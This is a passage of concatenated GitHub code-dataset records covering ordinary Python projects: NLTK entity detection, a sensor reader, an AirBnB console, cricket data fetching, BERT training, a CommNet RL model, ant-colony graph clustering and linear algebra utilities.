pymongo import MongoClient\r\n\r\nclient = MongoClient()\r\ndb = client.shuffled_DB2\r\n\r\n# This is to get the type of a tuple\r\ntup = (1, 2, 3)\r\n\r\n# Types of named entities that can be recognized from the tweet\r\nentities = [\"ORGANIZATION\", \"PERSON\", \"LOCATION\", \"DATE\", \"TIME\", \"MONEY\", \"PERCENT\", \"FACILITY\", \"GPE\"]\r\n\r\ndef checkForNamedEntities(tree):\r\n # A plain tuple is a (token, POS) leaf, so it cannot be a named-entity subtree\r\n if(type(tree) == type(tup)):\r\n return False\r\n else:\r\n tag = tree.label()\r\n if(tag in entities):\r\n return True\r\n else:\r\n # Recurse into the subtrees; report True as soon as any entity is found\r\n for node in tree:\r\n if(checkForNamedEntities(node)):\r\n return True\r\n return False\r\n\r\n\r\ndef checkNER(tweetsList):\r\n for tweet in tweetsList:\r\n # Tokenize the words in the given tweet\r\n tokenized = nltk.word_tokenize(tweet)\r\n\r\n # Identify the parts of speech of each token\r\n tagged = nltk.pos_tag(tokenized)\r\n\r\n # Identify named entities using the parts of speech from the Tweet\r\n tree = nltk.ne_chunk(tagged)\r\n if(checkForNamedEntities(tree)):\r\n return True\r\n # No tweet in the list contained a named entity\r\n return False\r\n","repo_name":"anmolshkl/Breaking-News-Detection-on-Twitter","sub_path":"LSH/ner.py","file_name":"ner.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"35"}
{"seq_id":"29829580274","text":"# function to get readings from wifi temp & humidity sensor\n\nfrom __main__ import *\nimport requests\n\ndef getWifiTempHumidityReadings(input_dict):\n logger = logging.getLogger('getWifiTempHumidityReadings')\n logger.addHandler(handler)\n logger.setLevel(logging.DEBUG)\n\n # initialize output dict\n response_dict = {}\n\n for s in input_dict:\n logger.debug(s)\n logger.info(\"Current sensor name: %s\" % s)\n logger.info(\"Current sensor config ID: %s\" % input_dict[s]['config_id'])\n r = requests.get(input_dict[s]['url'])\n response = r.text\n logger.debug(\"Raw binary response: %s\" % response.encode('utf-8'))\n response = response.replace('\\r', '')\n list_data = response.split(\",\")\n if input_dict[s]['version'] == 1:\n sensor_type = list_data[0]\n temperature = list_data[1]\n humidity = list_data[2]\n elif input_dict[s]['version'] == 2:\n sensor_type = list_data[1]\n temperature = list_data[2]\n humidity = list_data[3]\n else:\n logger.error(\"Unsupported sensor version\")\n logger.debug(\"Parameter 1 =%s\" % sensor_type)\n logger.debug(\"Parameter 2 =%s\" % temperature)\n logger.debug(\"Parameter 3 =%s\" % humidity)\n\n # build response dict\n response_dict[s] = {}\n response_dict[s]['temperature'] = temperature\n response_dict[s]['humidity'] = humidity\n\n return response_dict\n\n\nif __name__ == \"__main__\":\n import logging\n log_name = 'privateEyePiSensorTest.log'\n logger = logging.getLogger('privateEyePiSensorTest.py')\n handler = logging.FileHandler('privateEyePiSensorTest.log')\n formatter = logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s')\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n logger.setLevel(logging.DEBUG)\n\n logger.info(\"Main started\")\n\n sensor_dict = {}\n #sensor_dict['sensor_qty'] = 1\n sensor_dict['ESP_1853FE'] = {}\n sensor_dict['ESP_1853FE']['config_id'] = 'sensor.1'\n sensor_dict['ESP_1853FE']['url'] = 'http://192.168.0.184/temp'\n sensor_dict['ESP_1853FE']['version'] = 2\n logger.debug(sensor_dict)\n \n x = getWifiTempHumidityReadings(sensor_dict)\n logger.debug(x)\n logger.info(\"Main 
finished\")","repo_name":"ericloeliger/python-common-modules","sub_path":"privateEyePiSensor.py","file_name":"privateEyePiSensor.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34116439593","text":"#!/usr/bin/python3\n\n\"\"\"\nA command line interpreter for our AirBnB clone project\n\"\"\"\n\nimport cmd\nimport models\nfrom models import storage\nfrom models.base_model import BaseModel\nfrom models.amenity import Amenity\nfrom models.user import User\nfrom models.state import State\nfrom models.city import City\nfrom models.place import Place\nfrom models.review import Review\n\nclasses = {'BaseModel': BaseModel, 'User': User, 'Place': Place,\n 'State': State, 'City': City, 'Amenity': Amenity, 'Review': Review}\n\n\nclass HBNBCommand(cmd.Cmd):\n \"\"\"Airbnb_clone console\"\"\"\n\n prompt = '(hbnb) '\n\n def __init__(self, completekey='tab', stdin=None, stdout=None):\n \"\"\"init method\"\"\"\n\n super().__init__(completekey, stdin, stdout)\n\n def do_EOF(self, line):\n \"\"\"End of The File\"\"\"\n\n return True\n\n def do_quit(self, line):\n \"\"\"Quit command to exit the program\"\"\"\n\n return True\n\n def emptyline(self):\n \"\"\"an empty line + ENTER shouldn’t execute anything\"\"\"\n\n pass\n\n def do_create(self, args):\n \"\"\"Creates a new instance of BaseModel,\n saves it (to the JSON file) and prints the id\"\"\"\n\n if not (args):\n print(\"** class name missing **\")\n elif args not in HBNBCommand.classes:\n print(\"** class doesn't exist **\")\n else:\n instance = eval[args]()\n instance.save()\n print(instance.id)\n\n def do_show(self, args):\n \"\"\"Prints the string representation of an instance\n based on the class name and id\"\"\"\n\n if not (args):\n print(\"** class name missing **\")\n else:\n args = args.split()\n if len(args) != 2:\n print(\"** instance id missing **\")\n elif args[0] not in classes:\n print(\"** class doesn't exist **\")\n else:\n for k, v in storage.all().items():\n if args[1] == v.id:\n print(v)\n return\n print(\"** no instance found **\")\n\n def do_destroy(self, args):\n \"\"\"Deletes an instance based on the class name\n and id (save the change into the JSON file).\"\"\"\n\n args = args.split()\n if not args:\n print(\"** class name missing **\")\n return\n elif len(args) < 2:\n print(\"** instance id missing **\")\n return\n if args[0] not in classes:\n print(\"** class doesn't exist **\")\n return\n for k, v in storage.all().items():\n if args[1] == v.id:\n del storage.all()[k]\n storage.save()\n return\n print(\"** no instance found **\")\n\n def do_all(self, args):\n \"\"\"Prints all string representation of all instances\n based or not on the class name.\"\"\"\n\n if args == \"\":\n print([x.__str__() for x in models.storage.all().values()])\n else:\n try:\n model = models.classes[args]\n resp = []\n for x in models.storage.all().values():\n if type(x) == model:\n resp.append(x.__str__())\n print(resp)\n except Exception as e:\n print(e)\n\n def do_update(self, args):\n \"\"\"Updates an instance based on the class name and\n id by adding or updating attribute\n (save the change into the JSON file).\"\"\"\n\n args = args.split()\n if len(args) == 0:\n print(\"** class name missing **\")\n return False\n if args[0] in classes:\n if len(args) > 1:\n key = args[0] + '.' 
+ args[1]\n if key in storage.all():\n if len(args) > 2:\n if len(args) > 3:\n setattr(storage.all()[key], args[2], args[3])\n storage.all()[key].save()\n else:\n print(\"** value missing **\")\n else:\n print(\"** attribute name missing **\")\n else:\n print(\"** no instance found **\")\n else:\n print(\"** instance id missing **\")\n else:\n print(\"** class doesn't exist **\")\n\n\nif __name__ == '__main__':\n HBNBCommand().cmdloop()\n","repo_name":"FranklineMisango/AirBnB_clone","sub_path":"console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":4408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71961237221","text":"# ----------------------------------------------------------------------------------------------------------------------\nfrom BST_01_build import BST_from_list\nfrom BST_03_is_balanced import get_height\nfrom BST_02_print import print_BST\nimport numpy\n# ----------------------------------------------------------------------------------------------------------------------\ndef traverse_for_depth_pos(node,depth,pos):\n\n if node.L is None and node.R is None:\n return [depth],[pos]\n levels,positions = [],[]\n if node.L is not None:\n levels,positions = traverse_for_depth_pos(node.L,depth+1,2*pos)\n\n levels.append(depth)\n positions.append(pos)\n\n if node.R is not None:\n l,p= traverse_for_depth_pos(node.R,depth+1,2*pos+1)\n levels+=l\n positions+=p\n\n return levels, positions\n# ----------------------------------------------------------------------------------------------------------------------\ndef max_width(root):\n\n level,pos = traverse_for_depth_pos(root,0,0)\n pos = numpy.array(pos)\n level = numpy.array(level)\n max_depth = 0\n for each in set(level):\n idx = numpy.where(level==each)\n d = numpy.max(pos[idx])-numpy.min(pos[idx])\n max_depth = max(max_depth,d)\n\n return max_depth\n# ----------------------------------------------------------------------------------------------------------------------\n\nif __name__ == '__main__':\n A = list('jqpxldy')\n\n #root = BST_from_list(A)\n #res = max_width(root)\n #print(res)\n\n B=u'sdfsfsdf'\n BB = list(B.encode('utf-8'))\n C = [chr(each) for each in BB]\n D = ''.join(C)\n print(D)\n\n\n\n","repo_name":"dryabokon/algo","sub_path":"BST_08_max_width.py","file_name":"BST_08_max_width.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"27493705287","text":"\n# this code takes the csv versions of the cricsheet.org data for t20i and league matches\n# it produces two csvs: a stacked version of all the ball-by-ball (bbb) data and the result and toss of each match\n# it adds a few new columns depicting game state (wickets, runs etc.) 
and removes games that ended in no result, a tie, or a super-over result.\n\n#---------------standard packages------------------\nimport numpy as np\nimport pandas as pd\nimport datetime as dt\nfrom tqdm import tqdm\nfrom pathlib import Path\n\n#-----------------zip processors-------------------\nfrom io import BytesIO\nfrom zipfile import ZipFile\nfrom urllib.request import urlopen\n\n#-------------------csv readers--------------------\nimport csv\nfrom io import TextIOWrapper\n\n#----------------league dictionary-----------------\nleague_dict = {'ntb':'Vitality Blast', 'ipl':'Indian Premier League',\n 'cpl':'Caribbean Premier League', 'psl':'Pakistan Super League',\n 'bbl':'Big Bash League', 't20s':'T20 Internationals'}\n \n#----------------fetch bbb data--------------------\ndef cricsheet_fetch(url):\n\n zipfile = ZipFile(BytesIO(urlopen(url).read()))\n ziplist = zipfile.namelist()\n\n ziplist.remove('README.txt')\n if 'all_matches.csv' in ziplist:\n ziplist.remove('all_matches.csv')\n \n league = league_dict[url.split('_')[-3].split('/')[-1]]\n \n def file_row(file):\n row_dict = {}\n reader = csv.reader(TextIOWrapper(zipfile.open(file), 'utf-8'))\n row_dict['match_id'] = file.replace('_info.csv','')\n\n team_names = []\n for row in reader:\n if 'toss_winner' in row:\n row_dict['toss_winner'] = row[-1]\n elif 'winner' in row:\n row_dict['result'] = row[-1]\n elif 'outcome' in row:\n row_dict['result'] = row[-1]\n elif 'team' in row:\n team_names.append(row[-1])\n row_dict['match_name'] = team_names[0] + ' v ' + team_names[1]\n return row_dict\n\n results = pd.DataFrame.from_dict([file_row(file) for file in ziplist\n if 'info' in file]).set_index('match_id').rename_axis(index=None)\n \n results = results[~results['result'].isin(['tie','no result'])] # remove ties and no-results\n\n match_stack = pd.concat([pd.read_csv(zipfile.open(file), dtype = {'ball':str, 'match_id':str},\n parse_dates = ['start_date']) for file in ziplist \n if 'info' not in file and file in results.index + '.csv'], ignore_index=True)\n\n match_stack.insert(1, 'league', league)\n \n out = (match_stack['player_dismissed'] == match_stack['striker']) | (\n match_stack['other_player_dismissed'] == match_stack['striker'])\n \n match_stack.insert(7, 'out', out)\n \n#---------------game state features----------------\n ball_no = pd.DataFrame(match_stack['ball'].str.split('.').tolist()).astype('int')\n match_stack.insert(6, 'ball_no', ball_no[0]*6 + ball_no[1].clip(upper = 6))\n\n match_stack['runs'] = match_stack['runs_off_bat'] + match_stack['extras']\n match_stack['wickets'] = match_stack['wicket_type'].notna() + match_stack['other_wicket_type'].notna()\n \n game_state = match_stack.groupby(['match_id', 'innings']).cumsum()[['runs','wickets']]\n match_stack = match_stack.join(game_state, lsuffix = '_0')\n \n runs = match_stack.pop('runs')\n wickets = match_stack.pop('wickets')\n \n match_stack.insert(8, 'runs', runs - match_stack['runs_0'])\n match_stack.insert(9, 'wickets', wickets - match_stack['wickets_0'])\n match_stack.drop(['runs_0', 'wickets_0'], axis = 1, inplace = True)\n \n#--------------------icc filter--------------------\n icc_teams=['Australia', 'England', 'Bangladesh', 'India', 'Pakistan', 'South Africa',\n 'New Zealand', 'West Indies', 'Sri Lanka', 'Afghanistan', 'Zimbabwe',\n 'Netherlands', 'Scotland', 'Ireland']\n\n if league == 'T20 Internationals':\n match_stack = match_stack[match_stack['batting_team'].isin(icc_teams) & \n match_stack['bowling_team'].isin(icc_teams)]\n \n results = 
results[results.index.isin(match_stack['match_id'].unique())]\n \n match_stack.reset_index(inplace = True, drop = True)\n\n results = results.merge(match_stack[match_stack['innings'] == 1].drop_duplicates('match_id'),\n left_index = True, right_on = 'match_id').set_index('match_id')\n\n results = results[['start_date', 'league', 'venue', 'match_name',\n 'batting_team', 'bowling_team','toss_winner', 'result']].rename(columns = {'batting_team':'set_team',\n 'bowling_team':'chase_team'})\n return match_stack, results\n\n#-------------loop over leagues/t20i---------------\ndef multi_fetch(leagues = ['ntb', 'ipl', 'cpl', 'psl', 'bbl', 't20s']):\n \n match_stack_list, results_list = [], []\n for league in tqdm(leagues):\n match_stack, results = cricsheet_fetch('https://cricsheet.org/downloads/' + league + '_male_csv2.zip')\n match_stack_list.append(match_stack)\n results_list.append(results)\n\n pd.concat(match_stack_list,ignore_index = True).to_csv(Path('data/master/master_data.csv'),index = False)\n pd.concat(results_list).to_csv(Path('data/master/master_results.csv'))\n \n#-------------------run script---------------------\nmulti_fetch()","repo_name":"caiodrear/gayle","sub_path":"code/data_processing/cricsheet_fetch.py","file_name":"cricsheet_fetch.py","file_ext":"py","file_size_in_byte":5526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"24297630241","text":"#!/usr/bin/env python\n\n\"\"\"\nLittle library to help converting input arguments to scripts\ninto a list.\nThe input arguments can be a list of items and/or read from a file\nExamples:\n $ myprogram a b c\n\n $ myprogram --file f\n $ cat f\n a\n b\n c\n\n $ myprogram --file f z x y\n\"\"\"\nimport braceexpand\nimport argparse\n\ndef expand(arg):\n \"\"\"\n expand bash-like arguments compressed in brackets.\n Examples:\n foo_{01,02,03}_bar --> foo_01_bar foo_02_bar foo_03_bar\n \"foo_{01..03}_bar\" --> foo_01_bar foo_02_bar foo_03_bar !! 
Note the quotes !!\n input: string\n output: list\n \"\"\"\n return list( braceexpand.braceexpand(arg) )\n\n\ndef getlist(args_l):\n parser = argparse.ArgumentParser()\n parser.add_argument('--file')\n parser.add_argument('items', nargs='*')\n args, unknown = parser.parse_known_args(args_l)\n out = _parse_positional(args.items)\n if args.file:\n # there could be more than one file, split by comma\n for filename in args.file.split(','):\n out = _parse_file(out, filename)\n return out\n\ndef _parse_positional(arg_l):\n out = []\n for arg in arg_l:\n new_arg_l = expand(arg)\n for new_arg in new_arg_l:\n if new_arg not in out:\n out.append(new_arg)\n return out\n\ndef _parse_file(out, filename):\n f = open(filename)\n for line in f.readlines():\n line = line.strip()\n if line.startswith('#'):\n continue\n if line == '':\n continue\n arg_l = expand(line)\n for arg in arg_l:\n if arg not in out:\n out.append(arg)\n return out\n","repo_name":"jose-caballero/craftpy","sub_path":"itemlist.py","file_name":"itemlist.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"4967968001","text":"import os\nimport sys\nsys.path.append('..')\nfrom model_base import Model\nfrom tqdm import tqdm\nfrom transformers import AdamW, get_linear_schedule_with_warmup\nimport torch\nfrom sklearn.metrics import classification_report, f1_score, recall_score, precision_score, accuracy_score\n\n\ndef train(config, train_iter, dev_iter):\n model = Model(config).to(config.device)\n bert_param_optimizer = list(model.pre_model.named_parameters())\n\n no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']\n optimizer_grouped_parameters = [\n {\n 'params':[param for n,param in bert_param_optimizer if not any(nd in n for nd in no_decay)],\n 'weight_decay': 0.01,\n 'lr': config.bert_learning_rate\n },\n {\n 'params': [p for n, p in bert_param_optimizer if any(nd in n for nd in no_decay)],\n 'weight_decay': 0.0,\n \"lr\": config.bert_learning_rate\n }\n ]\n optimizer = AdamW(params = optimizer_grouped_parameters,\n betas = (0.9, 0.98),\n lr = config.bert_learning_rate,\n eps = 1e-8)\n\n scheduler = get_linear_schedule_with_warmup(optimizer,\n num_warmup_steps = int(len(train_iter) * config.train_epoch * config.warmup_prop),\n num_training_steps = len(train_iter) * config.train_epoch)\n\n # training loop\n cum_step = 0\n for i in range(config.train_epoch):\n model.train()\n for input_ids, attention_mask, token_type_ids, labels, tokens_cpu in tqdm(train_iter, position=0, ncols=80, desc='training'):\n loss = model.forward(input_ids, attention_mask, token_type_ids, labels)\n loss.backward()\n optimizer.step()\n scheduler.step()\n model.zero_grad()\n cum_step += 1\n\n # evaluate on the dev set\n f1, p, r = set_eval(config, model, dev_iter)\n\n # save the model\n model_to_save = model.module if hasattr(model,'module') else model\n output_model_file = os.path.join(\n os.path.join(config.model_save_path, 'model_{:.4f}_{:.4f}_{:.4f}_{}.bin'.format(p, r, f1, str(cum_step)))\n )\n torch.save(model_to_save, output_model_file)\n\ndef set_eval(config, model, dev_iter):\n model.eval()\n true_label_list, pred_label_list = [], []\n for input_ids, attention_mask, token_type_ids, labels, tokens_cpu in tqdm(dev_iter, position=0, ncols=80, desc='evaluating'):\n prob, pred = model.forward(input_ids, attention_mask, token_type_ids, labels=None)\n\n labels = labels.cpu().numpy()\n pred = pred.cpu().numpy()\n true_label_list.extend(labels)\n pred_label_list.extend(pred)\n\n # evaluation metrics\n f1 = 
f1_score(y_true=true_label_list, y_pred=pred_label_list, average='macro')\n p = precision_score(y_true=true_label_list, y_pred=pred_label_list, average='macro')\n r = recall_score(y_true=true_label_list, y_pred=pred_label_list, average='macro')\n report = classification_report(y_true=true_label_list, y_pred=pred_label_list)\n\n # write the evaluation results to the logger\n config.logger.info(report)\n config.logger.info('precision: {}, recall {}, f1 {}'.format(p, r, f1))\n\n return f1, p, r","repo_name":"languandong/question_matching_pytorch","sub_path":"total_utils/train_utils.py","file_name":"train_utils.py","file_ext":"py","file_size_in_byte":3137,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
{"seq_id":"14350055856","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\n\nclass CommNet(nn.Module):\n '''\n Implements CommNet for a single building\n Of the CityLearn challenge\n LSTM version with skip connection for the final layer\n\n TODO: Try basic version without LSTM / alter skip connections etc\n But might be a better idea to explore more advanced architectures instead\n '''\n\n def __init__(\n self, \n agent_number, # Number of buildings present\n input_size, # Observation accessible to each building (assuming homogeneous)\n hidden_size = 10, # Hidden vector accessible at each communication step\n comm_size = 4, # Number of communication channels\n comm_steps = 2 # Number of communication steps\n ):\n \n super(CommNet, self).__init__()\n\n self.device = 'cpu'\n self.input_size = input_size\n self.comm_size = comm_size\n self.agent_number = agent_number\n self.comm_steps = comm_steps\n\n # Calculate first hidden layer \n self._in_mlp = nn.Sequential(\n nn.Linear(input_size,input_size),\n nn.LeakyReLU(),\n nn.BatchNorm1d(input_size),\n nn.Linear(input_size,input_size),\n nn.LeakyReLU(),\n nn.BatchNorm1d(input_size),\n nn.Linear(input_size,hidden_size)\n )\n\n # Communication \n self._lstm = nn.LSTMCell(\n input_size = comm_size,\n hidden_size = hidden_size\n )\n\n self._comm_mlp = nn.Sequential(\n nn.Linear(hidden_size,hidden_size),\n nn.LeakyReLU(),\n nn.Linear(hidden_size,comm_size)\n )\n\n # Output\n # Calculate based on inputs and final memory\n self._out_mlp = nn.Sequential(\n nn.Linear(input_size+hidden_size, input_size+hidden_size),\n nn.LeakyReLU(),\n nn.Linear(input_size+hidden_size, input_size+hidden_size),\n nn.LeakyReLU(),\n nn.Linear(input_size+hidden_size, 1),\n nn.Tanh()\n )\n\n\n def forward(self,x : torch.Tensor, batch = False):\n\n out = None\n if not batch:\n\n # (Building, Observations)\n \n # Initial hidden states\n hidden_states = self._in_mlp(x)\n cell_states = torch.zeros(hidden_states.shape,device=self.device)\n\n # Communication\n for t in range(self.comm_steps):\n # Calculate communication vectors\n comm = self._comm_mlp(hidden_states)\n total_comm = torch.sum(comm,0)\n comm = (total_comm - comm) / (self.agent_number-1)\n # Apply LSTM \n hidden_states, cell_states = self._lstm(comm,(hidden_states,cell_states))\n \n out = self._out_mlp(torch.cat((x,hidden_states),dim=1))\n else:\n # (Batch, Building, Observation)\n out = torch.stack([self.forward(a) for a in x])\n\n return out\n\n def to(self,device):\n super().to(device)\n self.device = device\n\nclass SingleCritic(nn.Module):\n\n def __init__(self,\n input_size, \n action_size = 1,\n hidden_layer_size = 32):\n super(SingleCritic, self).__init__()\n\n self.input_size = input_size\n self.action_size = action_size\n\n self._in_mlp = nn.Sequential(\n nn.Linear(input_size + action_size, hidden_layer_size),\n 
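# two LeakyReLU-activated hidden layers feed a final 1-unit linear head that scores the flattened (state, action) pair\n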
nn.LeakyReLU(),\n nn.Linear(hidden_layer_size, hidden_layer_size),\n nn.LeakyReLU(),\n nn.Linear(hidden_layer_size, 1),\n )\n\n def forward(self, state, action):\n x = torch.cat((torch.flatten(state,start_dim=1),torch.flatten(action,start_dim=1)),dim=1)\n return self._in_mlp(x)\n\nfrom sklearn.preprocessing import MinMaxScaler\n\nclass MinMaxNormalizer:\n\n def __init__(self, obs_dict):\n observation_space = obs_dict['observation_space'][0]\n low, high = observation_space['low'],observation_space['high']\n \n self.scalar = MinMaxScaler()\n self.scalar.fit([low,high])\n\n def transform(self, x):\n return self.scalar.transform(x)\n\n\n# Experience replay needs a memory - this is it!\n# Double stack implementation of a queue - https://stackoverflow.com/questions/69192/how-to-implement-a-queue-using-two-stacks\nclass Queue:\n # per-instance stacks: class-level lists would be shared by every Queue instance\n def __init__(self):\n self.a = []\n self.b = []\n\n def enqueue(self, x):\n self.a.append(x)\n \n def dequeue(self):\n if len(self.b) == 0:\n while len(self.a) > 0:\n self.b.append(self.a.pop())\n if len(self.b):\n return self.b.pop()\n\n def __len__(self):\n return len(self.a) + len(self.b)\n\n def __getitem__(self, i):\n if i >= self.__len__():\n raise IndexError\n if i < len(self.b):\n return self.b[-i-1]\n else:\n return self.a[i-len(self.b)]\n\n","repo_name":"leomuckley/city-learn-2022","sub_path":"comm_net.py","file_name":"comm_net.py","file_ext":"py","file_size_in_byte":5071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"74329380580","text":"from playLA.LinearSystem import rank\nfrom .Vector import Vector\nfrom .Matrix import Matrix\n\n\ndef gram_schmidt_process(basis):\n matrix = Matrix(basis)\n assert rank(matrix) == len(basis)\n\n res = [basis[0]]\n for i in range(1, len(basis)):\n p = basis[i]\n for r in res:\n p = p - basis[i].dot(r) / r.dot(r) * r\n res.append(p)\n return res\n\n\ndef qr(A: Matrix):\n\n assert A.row_num() == A.col_num(), \"A must be square\"\n\n basis = [A.col_vector(i) for i in range(0, A.col_num())]\n P = gram_schmidt_process(basis)\n Q = Matrix([v / v.norm() for v in P]).T()\n R = Q.T().dot(A)\n\n return Q, R\n\n\n# project vector b onto the column space of matrix A\ndef least_squares(A: Matrix, b: Vector):\n # compute an orthogonal basis of the column space\n basis = [A.col_vector(i) for i in range(0, A.col_num())]\n P = gram_schmidt_process(basis)\n\n res = Vector.zero(len(b))\n for p in P:\n res = res + b.dot(p) / p.dot(p) * p\n return res\n","repo_name":"DaoLinZhou/learning-linear-algebra","sub_path":"playLA/GramSchmidtProcess.py","file_name":"GramSchmidtProcess.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"9900470451","text":"from undirected_graph import UndirectedGraph\nfrom cluster import Cluster\nfrom random import randint\nfrom random import uniform\n\ndef aco_sol_cluster(graph: UndirectedGraph, cluster_count: int):\n matr = {}\n for node in graph.nodes():\n matr[node] = {}\n for cluster in range(1, cluster_count+1):\n matr[node][cluster] = 100\n\n for iteration in range(1000):\n print('Iteration ' + str(iteration))\n\n solution = {}\n for node in graph.nodes():\n total = sum(matr[node].values())\n choice = uniform(0, total-1)\n cluster = 1\n while matr[node][cluster] < choice:\n choice -= matr[node][cluster]\n cluster += 1\n solution[node] = cluster\n\n clusters = {}\n for c in range(1, cluster_count+1):\n clusters[c] = Cluster(graph, [])\n\n for node in solution.keys():\n clusters[solution[node]].add(node)\n\n mod_dens = 0\n for cluster in clusters.values():\n
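# sum modularity density over all clusters; this total drives the pheromone update below\n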
mod_dens += cluster.modularity_density()\n\n for node in solution.keys():\n cl = solution[node]\n matr[node][cl] += (mod_dens + clusters[cl].modularity_density() / 5) /5\n if matr[node][cl] == 0:\n matr[node][cl] = 0\n\n cluster_list = []\n for c in range(1, cluster_count+1):\n clust = Cluster(graph, [])\n for node in graph.nodes():\n if max(matr[node].values()) == matr[node][c]:\n clust.add(node)\n cluster_list.append(clust)\n\n print(' ', end='')\n for node in graph.nodes():\n print(node, ' ', end='')\n print('')\n for c in range(1, cluster_count+1):\n print(c, ' ', end='')\n for node in graph.nodes():\n print(\"%.2f\" % matr[node][c], ' ', end='')\n print('')\n\n return cluster_list\n\ndef aco_graph_cluster(graph: UndirectedGraph):\n edges = {}\n steps = 0\n for node in graph.nodes():\n for neigh in graph.neighbors(node):\n edges[(node, neigh)] = 10\n edges[(neigh, node)] = 10\n steps += 1\n steps = int(0.1 * steps / 100) + 1\n nodes = [node for node in graph.nodes()]\n\n for iteration in range(1000):\n print('Iteration ' + str(iteration))\n\n for i in range(len(nodes)):\n ant = nodes[randint(0, len(nodes)-1)]\n # print('Node ' + str(nodes[i]))\n # ant = nodes[i]\n for step in range(steps):\n next_nodes = graph.neighbors(ant)\n if len(next_nodes) == 0:\n continue\n # print(next_nodes)\n prob = [edges[(ant, n)] for n in next_nodes]\n # print('prob:',prob)\n total = sum(prob)\n prob = [p / total for p in prob]\n direction = uniform(0, 1)\n while direction > prob[0]:\n direction -= prob[0]\n next_nodes = next_nodes[1:]\n prob = prob[1:]\n next_node = next_nodes[0]\n # print('next_node ', next_node)\n edges[(next_node, ant)] += 0.1\n edges[(ant, next_node)] += 0.1\n ant = next_node\n\n suma = 0\n for i in range(len(nodes)):\n for j in range(i+1, len(nodes)):\n if (nodes[i], nodes[j]) in edges:\n print(str(nodes[i]) + ',' + str(nodes[j]) + ' : ' + str(edges[(nodes[i], nodes[j])]))\n suma += edges[(nodes[i], nodes[j])]\n suma = 2 * suma / len(edges)\n print(suma)\n\n cluster_list = []\n while len(nodes) != 0:\n node = nodes.pop()\n clust = Cluster(graph, [node])\n vecini = []\n for neigh in graph.neighbors(node):\n if (node, neigh) in edges and edges[(node, neigh)] > 0.9 * suma:\n vecini.append(neigh)\n clust.add(neigh)\n if neigh in nodes:\n nodes.remove(neigh)\n del edges[(node, neigh)]\n del edges[(neigh, node)]\n while len(vecini) != 0:\n n = vecini.pop()\n for neigh in graph.neighbors(n):\n if (n, neigh) in edges and edges[(n, neigh)] > 0.9 * suma and neigh not in clust:\n vecini.append(neigh)\n clust.add(neigh)\n if neigh in nodes:\n nodes.remove(neigh)\n del edges[(n, neigh)]\n del edges[(neigh, n)]\n cluster_list.append(clust)\n\n return cluster_list\n","repo_name":"MalcomMerlyn/dizertatie","sub_path":"sources_py/aco_clustering.py","file_name":"aco_clustering.py","file_ext":"py","file_size_in_byte":4578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"22336302817","text":"import pandas as pd\nimport matplotlib as mpl\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\nimport sys\nimport matplotlib.pyplot as plt\ndef plot3D(file1,file2):\n\tdata_df = pd.read_csv(file1,delimiter = ' ',header=None)\n\tdata_df2 = pd.read_csv(file2, delimiter = ' ',header=None)\n\tx = data_df[1]\n\ty = data_df[2]\n\tz = data_df[3]\n\n\tx1 = data_df2[1]\n\ty1 = data_df2[2]\n\tz1 = data_df2[3]\n\n\txStart = x[:50]\n\tyStart = y[:50]\n\tzStart = z[:50]\n\n\n\tfig = plt.figure()\n\tax = fig.gca(projection='3d')\n\n\tax.plot(x1, y1, z1, 
label='pose graph_ORB')\n\tax.plot(x, y, z, label='pose graph_GroundTruth')\n\tax.plot(xStart, yStart, zStart, label='pose graph_GroundTruth_Start')\n\tax.legend()\n\n\tplt.show()\n\nplot3D(sys.argv[1],sys.argv[2])\n","repo_name":"sohaib3k/SLAM-Internship","sub_path":"plot3D.py","file_name":"plot3D.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"74674603939","text":"#!/usr/bin/python3\n\"\"\" SuperClass module.\n Define common attributes and methods for AirBnB console\n Classes:\n BaseModel: set common attributes & methods\n\"\"\"\n\nfrom uuid import uuid4\nfrom datetime import datetime\nimport models\n\n\nclass BaseModel():\n \"\"\" Define common attributes and methods for AirBnB console.\n Public instance attributes:\n id: unique id number, assigned with uuid.\n created_at: datetime assigned with the current date.\n updated_at: datetime assigned on creation or edition.\n __str__: custom str method prints readable class.\n Public instance methods:\n save(self): updates the public instance attribute update_at.\n to_dict(self): returns a dictionary with all key/values in\n __dict.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\" instance constructor\n \"\"\"\n\n if len(kwargs) > 0:\n for key in kwargs.keys():\n if key == '__class__':\n continue\n elif key == 'created_at' or key == 'updated_at':\n setattr(self, key,\n datetime.strptime(kwargs[key],\n '%Y-%m-%dT%H:%M:%S.%f'))\n else:\n setattr(self, key, kwargs[key])\n else:\n self.id = str(uuid4())\n self.created_at = datetime.now()\n self.updated_at = datetime.now()\n models.storage.new(self)\n\n def __str__(self):\n \"\"\" Print a readable representation of class\n Format:\n [<class name>] (<self.id>) <self.__dict__>\n \"\"\"\n\n return \"[{}] ({}) {}\".format(self.__class__.__name__,\n self.id,\n self.__dict__)\n\n def save(self):\n \"\"\" updates the public instance attribute updated_at\n \"\"\"\n\n 